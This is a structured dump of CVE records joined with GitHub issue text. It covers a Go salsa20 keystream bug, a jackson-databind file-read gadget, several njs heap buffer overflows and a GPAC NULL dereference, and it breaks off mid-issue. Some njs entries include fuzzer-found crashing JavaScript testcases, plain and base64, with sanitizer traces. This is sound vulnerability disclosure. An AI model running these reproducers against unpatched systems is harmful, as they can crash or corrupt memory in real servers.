"tags": [
"Third Party Advisory"
],
"url": "https://github.com/golang/go/issues/30965"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "https://go.googlesource.com/crypto/+/b7391e95e576cacdcdd422573063bc057239113d"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://groups.google.com/forum/#%21msg/golang-announce/tjyNcJxb2vQ/n0NRBziSCAAJ"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00029.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00014.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00016.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00030.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/01/msg00015.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00017.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://pkg.go.dev/vuln/GO-2022-0209"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:golang:crypto:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FBA1D5EA-C8A7-40C2-9D8E-7E1ECF8ADE80",
"versionEndExcluding": "2019-03-20",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/golang/go/issues/30965 | [
"Third Party Advisory"
] | github.com | [
"golang",
"go"
] | If more than 256 GiB of keystream is generated, or if the counter otherwise grows greater than 32 bits, the amd64 implementation will first generate incorrect output, and then cycle back to previously generated keystream. Repeated keystream bytes can lead to loss of confidentiality in encryption applications, or to predictability in CSPRNG applications.
The issue might affect uses of golang.org/x/crypto/nacl with extremely large messages.
Architectures other than amd64 and uses that generate less than 256 GiB of keystream for a single salsa20.XORKeyStream invocation are unaffected.
This issue was discovered and reported by Michael McLoughlin.
| x/crypto/salsa20: keystream loop in amd64 implementation after 256GiB | https://api.github.com/repos/golang/go/issues/30965/comments | 3 | 2019-03-20T22:32:56Z | 2020-05-09T07:00:19Z | https://github.com/golang/go/issues/30965 | 423,501,989 | 30,965 |
CVE-2019-12086 | 2019-05-17T17:29:00.483 | A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/109227"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2858"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2935"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2936"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2937"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2938"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2998"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3044"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3045"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3046"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3050"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3149"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3200"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/2326"
},
{
"source": "[email protected]",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592%40%3Ccommits.cassandra.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/88cd25375805950ae7337e669b0cb0eeda98b9604c1b8d806dccbad2%40%3Creviews.spark.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00030.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/May/68"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20190530-0003/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4452"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD",
"versionEndExcluding": "2.6.7.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "89660FC3-9198-414C-B89D-C61A4438BA3B",
"versionEndExcluding": "2.7.9.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5DB8A2D4-0FDE-4216-896B-52824106B97B",
"versionEndExcluding": "2.8.11.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0E3E465E-0DE3-4DD3-A023-6444C47895CE",
"versionEndExcluding": "2.9.9",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.9.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/FasterXML/jackson-databind/issues/2326 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | A new gadget type (see https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062) was reported, and CVE id allocated was `CVE-2019-12086`.
CVE description is available at: https://nvd.nist.gov/vuln/detail/CVE-2019-12086 for full details, but the specific variation (in addition to needing "default typing", attacker being able to craft specific json message) is that:
* If service has jar `mysql-connector-java` in its classpath
vulnerability applies, and attacker is able to read arbitrary files from service's local file system.
Original vulnerability discoverer: 618 from College of software, Nankai University
-----
Fixed in:
* 2.9.9 and later
* 2.8.11.4
* 2.7.9.6
* 2.6.7.3
| Block one more gadget type (mysql, CVE-2019-12086) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2326/comments | 12 | 2019-05-11T17:31:34Z | 2019-10-16T04:36:08Z | https://github.com/FasterXML/jackson-databind/issues/2326 | 443,018,345 | 2,326 |
CVE-2019-12206 | 2019-05-20T14:29:00.697 | njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in nxt_utf8_encode in nxt_utf8.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/162"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/162 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | NJS version
```
changeset: 965:e0fdef4eb478
tag: tip
user: Dmitry Volyntsev <[email protected]>
date: Thu May 16 15:20:31 2019 +0300
summary: Fixed uninitialized-memory-access in Object.defineProperties().
```
JavaScript testcase:
```js
var v0="@褀+Qh"
while (((((((((((((v0)>>>v0.toUpperCase())+() => {
})+(((((((v0)>>>v0.toUpperCase())+() => {
})+(ReferenceError))+(0>>>0))+0)+0))+0)+0)+0)+0)+0)+0)+0)+0)) {
}
```
JavaScript testcase (b64):
```
dmFyIHYwPSIAAEDopIAAACtRaAAAAAAiCndoaWxlICgoKCgoKCgoKCgoKCh2MCk+Pj52MC50b1VwcGVyQ2FzZSgpKSsoKSA9PiB7Cn0pKygoKCgoKCh2MCk+Pj52MC50b1VwcGVyQ2FzZSgpKSsoKSA9PiB7Cn0pKyhSZWZlcmVuY2VFcnJvcikpKygwPj4+MCkpKzApKzApKSswKSswKSswKSswKSswKSswKSswKSswKSkgewp9Cgo=
```
Valgrind output:
```
==5361== Memcheck, a memory error detector
==5361== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==5361== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info
==5361== Command: ./build/njs /home/fuzz/encode.js
==5361==
==5361== Invalid write of size 1
==5361== at 0x242704: nxt_utf8_encode (nxt_utf8.c:32)
==5361== by 0x155F04: njs_string_prototype_to_upper_case (njs_string.c:2243)
==5361== by 0x1CF36B: njs_function_native_call (njs_function.c:587)
==5361== by 0x130E2D: njs_vmcode_function_call (njs_vm.c:2061)
==5361== by 0x12BF6F: njs_vmcode_interpreter (njs_vm.c:159)
==5361== by 0x128E0B: njs_vm_start (njs.c:594)
==5361== by 0x1179E4: njs_process_script (njs_shell.c:770)
==5361== by 0x1123C4: njs_process_file (njs_shell.c:619)
==5361== by 0x1123C4: main (njs_shell.c:281)
==5361== Address 0x5efcb00 is 0 bytes after a block of size 8,192 alloc'd
==5361== at 0x4C31E76: memalign (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==5361== by 0x4C31F91: posix_memalign (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==5361== by 0x24923C: nxt_memalign (nxt_malloc.c:26)
==5361== by 0x11E52F: nxt_mp_alloc_cluster (nxt_mp.c:549)
==5361== by 0x11E52F: nxt_mp_alloc_page (nxt_mp.c:514)
==5361== by 0x11F12C: nxt_mp_alloc_small (nxt_mp.c:426)
==5361== by 0x1421F9: njs_string_alloc (njs_string.c:218)
==5361== by 0x12B1B1: njs_string_concat (njs_vm.c:1205)
==5361== by 0x136EC1: njs_vmcode_addition (njs_vm.c:1170)
==5361== by 0x12BF6F: njs_vmcode_interpreter (njs_vm.c:159)
==5361== by 0x128E0B: njs_vm_start (njs.c:594)
==5361== by 0x1179E4: njs_process_script (njs_shell.c:770)
==5361== by 0x1123C4: njs_process_file (njs_shell.c:619)
==5361== by 0x1123C4: main (njs_shell.c:281)
```
Found by [fluff](https://github.com/Samsung/Fluff) | heap-buffer-overflow in nxt_utf8_encode (nxt_utf8.c:32) | https://api.github.com/repos/nginx/njs/issues/162/comments | 0 | 2019-05-20T08:18:34Z | 2019-05-30T14:15:14Z | https://github.com/nginx/njs/issues/162 | 445,981,633 | 162 |
CVE-2019-12207 | 2019-05-20T14:29:00.773 | njs through 0.3.1, used in NGINX, has a heap-based buffer over-read in nxt_utf8_decode in nxt/nxt_utf8.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/168"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/168 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | Testcase (in base64):
```
bmV3IFJlZ0V4cChuZXcgUmVnRXhwKFJlZ0V4cCgobmV3IE9iamVjdCgiADs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7GDtzOzskOzs7OzsiLCAobmV3IEVycm9yKG5ldyBFcnJvcihuZXcgRXJyb3IobmV3IEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKG5ldyBJbnRlcm5hbEVycm9yKCgwLTApKSkpKSkpKSk8PTApKSswKSkpKQo=
```
njs version:
`changeset: 965:e0fdef4eb478`
Stack trace (from ASAN):
```
==22308==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62500000c100 at pc 0x555c148621d9 bp 0x7ffdddc241c0 sp 0x7ffdddc241b0
READ of size 1 at 0x62500000c100 thread T0
#0 0x555c148621d8 in nxt_utf8_decode nxt/nxt_utf8.c:72
#1 0x555c14862905 in nxt_utf8_length nxt/nxt_utf8.c:271
#2 0x555c147b5a06 in njs_regexp_prototype_source njs/njs_regexp.c:674
#3 0x555c147b5a06 in njs_regexp_constructor njs/njs_regexp.c:131
#4 0x555c147a9cdb in njs_function_native_call njs/njs_function.c:587
#5 0x555c146d1d82 in njs_vmcode_function_call njs/njs_vm.c:2061
#6 0x555c146c7d47 in njs_vmcode_interpreter njs/njs_vm.c:159
#7 0x555c146c2b83 in njs_vm_start njs/njs.c:594
#8 0x555c146a5cc3 in njs_process_script njs/njs_shell.c:770
#9 0x555c1469ef48 in njs_process_file njs/njs_shell.c:619
#10 0x555c1469ef48 in main njs/njs_shell.c:281
#11 0x7fcc25e56b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#12 0x555c146a0ef9 in _start (/home/build/njs/build/njs+0x2aef9)
```
Found by [fluff](https://github.com/Samsung/Fluff) | heap-buffer-overflow in nxt_utf8_decode nxt/nxt_utf8.c:72 | https://api.github.com/repos/nginx/njs/issues/168/comments | 4 | 2019-05-20T09:01:01Z | 2019-06-20T12:24:14Z | https://github.com/nginx/njs/issues/168 | 446,000,306 | 168 |
CVE-2019-12208 | 2019-05-20T14:29:00.837 | njs through 0.3.1, used in NGINX, has a heap-based buffer overflow in njs_function_native_call in njs/njs_function.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/163"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3F70BB50-E3EC-44F8-BC1A-D514EA261742",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/nginx/njs/issues/163 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | NJS version
```
changeset: 965:e0fdef4eb478
tag: tip
user: Dmitry Volyntsev <[email protected]>
date: Thu May 16 15:20:31 2019 +0300
summary: Fixed uninitialized-memory-access in Object.defineProperties().
```
JavaScript testcase:
```js
var v0=Array()
while(v0.includes(v0.u,(Object()+((Boolean))),(Boolean),((({}>(Boolean)))),(0),v0.toString(([URIError]+Object))){}
```
ASAN log:
```
==32113==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000000480 at pc 0x5561174c6af1 bp 0x7ffd29774220 sp 0x7ffd29774210
WRITE of size 16 at 0x619000000480 thread T0
#0 0x5561174c6af0 in njs_function_native_call njs/njs_function.c:623
#1 0x5561173e36b1 in njs_vmcode_continuation njs/njs_vm.c:2308
#2 0x5561173e3d47 in njs_vmcode_interpreter njs/njs_vm.c:159
#3 0x5561173deb83 in njs_vm_start njs/njs.c:594
#4 0x5561173c1cc3 in njs_process_script njs/njs_shell.c:770
#5 0x5561173baf48 in njs_process_file njs/njs_shell.c:619
#6 0x5561173baf48 in main njs/njs_shell.c:281
#7 0x7f37a800db96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#8 0x5561173bcef9 in _start (/home/build/njs/build/njs+0x2aef9)
```
Found by [fluff](https://github.com/Samsung/Fluff) | heap-buffer-overflow in njs_function_native_call njs/njs_function.c:623 | https://api.github.com/repos/nginx/njs/issues/163/comments | 1 | 2019-05-20T08:30:18Z | 2019-05-24T16:00:19Z | https://github.com/nginx/njs/issues/163 | 445,986,781 | 163 |
CVE-2019-12481 | 2019-05-30T23:29:00.267 | An issue was discovered in GPAC 0.7.1. There is a NULL pointer dereference in the function GetESD at isomedia/track.c in libgpac.a, as demonstrated by MP4Box. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1249"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00030.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CC18384-9350-47D7-A07D-C7D29622AE9E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/1249 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
